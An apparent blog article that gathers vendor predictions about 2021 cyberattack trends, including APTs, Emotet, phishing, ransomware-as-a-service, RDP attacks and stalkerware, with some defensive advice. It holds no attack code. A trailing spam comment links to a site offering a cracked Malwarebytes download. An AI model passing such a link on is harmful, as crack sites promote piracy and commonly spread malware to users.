When it comes to keeping up with the myriad ways cybercriminals can choose to conduct a cyberattack, it feels like running at full speed just to keep up. Nick Itta, VP, APAC, EfficientIP said, "As a result of COVID-19, organisations, communities and homes have had to overcome challenges in order to adapt to changes that came with the new normal. Remote working, deployment of 5G and dependence on cloud apps commercialisation of automation will increase the vulnerability of a network, causing a rise in ransomware and data theft due to cloud misconfiguration."
Here are some of the many ways industry observers say cybercriminals could deploy cyberattacks in 2021:
Advanced persistent threats (APTs)
An APT is a prolonged, targeted attack on a specific entity or entities with the intention of compromising their systems and gaining information from or about them. "APTs are switching up by targeting the air-gap network, and we can expect more attacks from these threats in 2021. (Cybercriminals are) also attempting to switch to multiplatform malware which threatens Linux and Mac operating systems," Malwarebytes Labs said.
The company also said that APTs are going to be found on mobile devices and that malicious documents are the main initial vector. While malicious macros were common, they are now less easy to detect as they could be embedded in Excel formulas, Malwarebytes noted.
Deepfakes
LogRhythm has predicted that deepfakes will become a significant threat to business integrity. "COVID-19 has forced in-person communication to go virtual, which means businesses are relying on videoconferencing to conduct meetings more than ever before. While the notion of deepfakes may not be new, they are getting increasingly sophisticated and are becoming remarkably easy to generate.
"Take ThisPersonDoesNotExist.com, for example, which leverages artificial intelligence (AI) to create completely believable images of people that don’t exist in real life. If this process can be conducted with relatively little information, then certainly hackers can leverage work profiles used for videoconferencing technology — which have employees’ names and pictures automatically associated with them — to create convincing fakes," warned Carder of LogRhythm.
Bjorn Engelhardt, VP of APAC at Forcepoint, forecast that disinformation is inevitable. "There is no silver bullet for decreasing disinformation. Everyone must be diligent about questioning what they see online," he said.
Emotet
Malwarebytes Labs warns that the Emotet Trojan will surface "well into 2021 and beyond". Emotet is primarily spread through spam emails, but could be delivered as a malicious script, macro-enabled document files, or malicious links, the company said. "Emotet emails may contain familiar branding designed to look like a legitimate email. It may try to persuade users to click the malicious files by using tempting language about 'Your Invoice', 'Payment Details', or possibly an upcoming shipment from well-known parcel companies," Malwarebytes said.
The top five sectors that Emotet targeted in Singapore in 2020 included the manufacturing, financial services, media, aviation and healthcare sectors, Malwarebytes said.
Fileless malware
ESET has been talking about “fileless malware” attacks, which piggyback on the operating system’s own tools and processes and leverage them for malicious purposes. According to the company, these techniques have been employed in various cyberespionage campaigns and by various malicious actors recently, mainly to hit high-profile targets such as government entities.
Camilo GutiĆ©rrez Amaya, ESET Senior Security Researcher, noted, “Fileless threats have been evolving rapidly, and it is expected that in 2021 these methods will be used in increasingly complex and larger-scale attacks. This situation highlights the need for security teams to develop processes leveraging tools and technologies that not only prevent malicious code from compromising computer systems, but that also have detection and response capabilities – even before these attacks fulfill their mission.”
Phishing
"In 2020 we saw hackers leverage COVID-19 to distribute a plethora of phishing scams to unsuspecting victims. The number of legitimate emails sent on the topic allowed phishing emails to hide in plain sight. As the race to secure and distribute a vaccine continues, the public will once again seek information on new developments. Attackers will purchase domains and craft emails with this in mind. The amount of content, combined with the thirst for knowledge, will set the stage for a further increase in phishing attacks," predicted LogRhythm.
Ransomware as-a-service
"We’re going to see an increase in less technical criminals leveraging ransomware. 2020 saw a drastic increase in ransomware attacks and many cybercriminals began using new and more sophisticated strains of ransomware. However, even though this trend will continue, there will be a new surge in ransomware-as-a-service as less technical hackers realise the value of ransomware," predicted Serkan Cetin, Technical Director, APJ, One Identity.
"This surge will be fuelled by the ongoing remote workforce as less secure networks and devices being used in the home allow ransomware to travel from personal devices onto the corporate networks. As more companies get hit, companies will start secretly paying the ransomware to avoid having to publicly announce the attack. As a result, stricter and larger fines from regulatory groups will be enforced as a way to encourage companies to proactively fight ransomware.
Cybercriminals are also threatening to leak sensitive data to encourage victims to pay ransoms, said ESET. Tony Anscombe, ESET Chief Security Evangelist, commented, “Companies are becoming smarter, deploying technologies that thwart attacks and creating resilient backup and restore processes, so the bad actors need a ‘Plan B’ to be able to monetise their effort and build resilience into the attack, rather than being reliant on a single form of threat.
“Thwarted attacks or diligent backup and restore processes may no longer be enough to fend off a committed cybercriminal who’s demanding a ransom payment. The success in monetising due to a change of technique offers cybercriminals an increased chance of a return on investment. This is a trend that, unfortunately, I am sure we will witness more of in 2021.”
Remote Desktop Protocol (RDP) attacks
Used for remotely connecting to Windows systems, cybercriminals look for unsecured RDP services through which to enter enterprise networks. Using social engineering or brute force, threat actors get hold of login credentials for a remote desktop, from which they will be able to deploy ransomware, said Malwarebytes Labs. "Many organisations fail to secure their RDP services against unauthorised access, making it easy for threat actors to execute an RDP attack. There are some things that you can do to make it harder for unauthorised users to access your network. This includes placing the RDP access behind a virtual private network (VPN); using a remote desktop gateway server, which also gives you additional security like two-factor authentication; using strong passwords; limit users; and enabling network level authentication (NLA)," the company said. Stalkerware
Stalkerware was prominent in 2020, and will continue to be so in 2021, said Malwarebytes Labs. "Throughout 2020, there has been an uptick in stalkerware-type app detections for Android since shelter-in-place orders (lockdowns) were implemented in March 2020. Stalkerware programs enable an abuser to intrude into a person’s private life and can be used as a tool for abuse in cases of domestic violence and stalking," the company said.
"By installing these applications on a person’s device, abusers can get access to their victim’s messages, photos, social media, geolocation, audio or camera recordings. Such programs run hidden in the background, without a victim’s knowledge or consent."
From January 1 to October 31, 2020, Malwarebytes recorded a 584% increase in monitor app detections, and a 1,044% increase in spyware detections, representing more than 43,000 monitor app detections in the first 10 months of 2020. In an effort to battle stalkerware, the Coalition Against Stalkerware was cofounded by Malwarebytes and established in 2019. It aims to improve detection and mitigation of stalkerware, as well as educate individuals and victims on the technical aspects of the threat.
Explore:
Mobile devices as targets
“With a remote workforce come new challenges as employees use personal devices to review sensitive information and work. At no fault of their own, employees who are working remotely open up an organisation to major vulnerabilities because these mobile devices are much easier for attackers to exploit," said Rick McElroy, Principal Cybersecurity Strategist, VMware Carbon Black.
"In 2021, we will see cybercriminals become more sophisticated in how they attack our mobile devices, ultimately executing an island-hopping scenario. If hackers can get into your Android or iPhone, they’ll then be able to enter your work network, whether it’s deactivating VPNs or breaking down firewalls.
"We will see companies roll out new mobile device policies and infrastructure to allow workers to continue working remotely but with greater awareness of the risks these devices pose and how to protect themselves and the organisation at large. Additionally, a large part of these policies will centre around software updates and patches, ensuring that all personal devices are up to date in order to fend off attackers who have already figured out how to hack into previous software versions.”
Industry observers have also identified new challenges in cybersecurity, and shared new solutions to mitigate risks in a separate blog post.
https://newactivators.com/malwarebytes-crack/
ReplyDelete